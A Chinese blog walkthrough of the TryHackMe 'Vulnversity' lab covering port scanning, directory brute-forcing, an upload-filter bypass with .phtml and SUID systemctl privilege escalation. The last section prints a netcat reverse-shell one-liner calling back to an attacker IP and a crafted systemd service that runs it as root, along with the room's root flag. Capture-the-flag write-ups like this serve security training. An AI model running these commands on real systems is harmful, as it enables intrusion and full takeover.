Tryhackme-Vulnversity

最新推荐文章于 2023-01-08 21:07:22 发布
最新推荐文章于 2023-01-08 21:07:22 发布
阅读量430 收藏
点赞数 1
分类专栏: # CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36531487/article/details/120288754
版权

Vulnversity ⭐️反弹shell ⭐️systemctl提权

文章目录

task1 Deploy the machine

无需回答

task2 Reconnaissance

1.There are many nmap “cheatsheets” online that you can use too.

无需回答

2.Scan the box, how many ports are open?

6

image-20210709160439714

3.What version of the squid proxy is running on the machine?

3.5.12

image-20210709160951200

4.How many ports will nmap scan if the flag -p-400 was used?

400

5.Using the nmap flag -n what will it not resolve?

DNS

-n 禁用DNS反向解析

6.What is the most likely operating system this machine is running?

Ubuntu

image-20210709161510799

7.What port is the web server running on?

3333

task3 Locating directories using GoBuster

1.What is the directory that has an upload form page?

/internal/

image-20210709163025593

task4 Compromise the webserver

1.Try upload a few file types to the server, what common extension seems to be blocked?

.php

image-20210709164333699

2.Run this attack, what extension is allowed?

.phtml

3.What is the name of the user who manages the webserver?

bill

image-20210709165015649

4.What is the user flag?

image-20210709165133666

task5 Privilege Escalation

1.On the system, search for all SUID files. What file stands out?

/bin/systemctl

find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件

/bin/systemctl 文件具备suid位可以用来提权

2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.

提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本

参考链接:Tryhackme - Vulnversity

即可执行任意脚本

参考链接:Tryhackme - Vulnversity

zhangwenbo1229
关注
专栏目录
Tryhackme - Vulnversity (考点:上传 & burp intruder & systemctl提权)
冬萍子癸水
05-25 730
1 扫描 21想到进去找文件,22可能有ssh登录,139 445 去smb找文件,3128可能有代理转发,3333是http web进去搜集信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |
TryHackMe-Vulnversity练习
m0_74606212的博客
01-26 396
TryHackMe-Vulnversity练习
Tryhackme-Basic Computer Exploitation
个人博客
08-10 423
Basic Computer Exploitation 文章目录Basic Computer ExploitationVulnversity :star:反弹shell :star:systemctl提权task1 Deploy the machinetask2 Reconnaissancetask3 Locating directories using GoBustertask4 Compromise the webservertask5 Privilege EscalationBasic Pente
kb-vuln3(systemctl提权)
m0_66299232的博客
10-23 913
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell。9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异。systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功。攻击机系统:kali linux 2021.1。
KB-VULN3靶机总结
qq_45301512的博客
01-08 219
靶机下载地址:打开靶机,将网络连接模式改成NAT,然后使用namp扫描端口,发现没有ip,利用网上搜索出来的方法,修改了靶机再次使用namp扫描了网段之后,发现了ip和打开的端口可以看到,开放了22端口,80端口,139端口和445端口先根据80端口打开网站,就是这样一个页面,什么功能也没有在目录扫描一波,看看目录下有没有可以利用的网站结果是除了首页,没有其它网页了一般我们的渗透测试都是利用网站的漏洞,但是这里似乎网站没有可以利用的地方。
TryHackMe-Notes:TryHackMe Rooms笔记
04-02
【标题】:TryHackMe-Notes:TryHackMe Rooms笔记 在网络安全领域,TryHackMe是一个广受欢迎的在线平台,提供了各种网络安全课程和虚拟机(VMs),专注于渗透测试、网络安全学习以及道德黑客技能的提升。"TryHackMe ...
tryhackme-writeups:可在TryHackMe.com上获得有关ROOMS的文章
03-09
TryHackMe撰写 是一个免费的在线平台,可通过您的浏览器使用动手练习和实验来学习网络安全! 客房 姓名 困难 简单 简单 简单 简单 中等的 简单 简单 简单 简单 中等的 中等的
thm-scripts:TryHackMe-Python脚本
04-19
THM-脚本 Python脚本可获取某些TryHackMe房间的标志。 要求 所有脚本均在Python v3.6上进行了测试。 用法 python3.6 script_name.py 执照
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
云计算-Linux-特殊权限-SUID-SGID-SBIT-ACL
weixin_48137911的博客
10-03 599
然后呢,acl上,设置权限,赋予了这个读写的权限,针对这个/etc的这个目录。这个代表这个目录有r权限,证明普通用户在这个绿色的目录下,干什么都行。首先呢,我这的用户有一堆,我就用这个我的id-ccie-yasuo了。但是注意哈,是不能删tmp的,他在根目录下呢,root才能删。代表他的权限有点大~首先呢,这个cat是在这个/use/bin的目录下的。他不是rwx,而是rws,这个s就这个特殊的权限了。显示这个权限是+号的,则代表是ACL添加的权限了。在这个目录下,虽然有权限,但是呢是删除不了的。
CentOS 7 上systemctl 的用法
weixin_34293911的博客
10-20 388
CentOS 7 上systemctl 的用法我们对service和chkconfig两个命令都不陌生,systemctl 是管制服务的主要工具, 它整合了chkconfig 与 service功能于一体。systemctl is-enabled iptables.servicesystemctl is-enabled servicename.service #查询服务是否开...
linux基本命令示例_Linux使用示例查找命令
cunjiu9486的博客
10-14 314
linux基本命令示例Linux provides a lot of important tools to make the administrator’s life easy. find command is one of the most important commands in Linux world. Find command provides a search according to...
nmap 使用手册
左飞的技事本
06-08 1968
nmap使用手册 nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、T
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)
冬萍子癸水
05-26 1212
1 扫描 主要就是80进web搜集信息 C:\root> nmap -A 10.10.16.216 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.64 secon
Basic Linux Privilege Escalation
公众号shadow sock7
09-17 1453
原文链接: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Basic Linux Privilege Escalation Before starting, I would like to point out - I'm no expert. As far as I kno
vulnhub - hackme 考点:(sql注入&上传&linux信息搜集)
冬萍子癸水
04-23 696
https://www.vulnhub.com/entry/hackme-1,330/ nat网络, arp-scan -l 扫出来比平常多的ip就是靶机 nmap看到80当然是web信息搜集,22想到找ssh登录信息 80看到登录框就注入干他,但是没用,可以注册,先注册吧。。 其他没收集到多少亮眼信息, 进入后是搜索书的搜索框。这种搜索框数据交互当然要想到注入了。。 试了几次,什么也别输入,点回...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于Python语言的UrlDetect URL检测设计源码
最新发布
10-02
该项目为基于Python语言的URL检测设计源码,包含24个文件,具体包含13个pickle文件、5个txt文件、3个label文件、2个py文件和1个md文件。该设计源码旨在实现高效的URL检测功能。
如何注册tryhackme
02-06
要注册TryHackMe,您需要执行以下步骤: 1. 打开TryHackMe的网站(https://tryhackme.com) 2. 点击网站的右上角的“注册”按钮 3. 在弹出的注册表单中输入您... 在完成这些步骤后,您就可以开始使用TryHackMe平台了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值